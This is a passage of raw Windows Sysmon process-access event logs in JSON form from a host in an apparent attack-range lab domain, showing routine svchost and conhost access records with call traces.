C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3898,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3899,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3900,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3901,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3902,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3903,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3904,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0247-5F25-0000-00107AD90500}\r\nTargetProcessId: 4568\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:55.473","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0247-5F25-0000-00107AD90500}","TargetProcessId":"4568","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3905,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:55.473\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 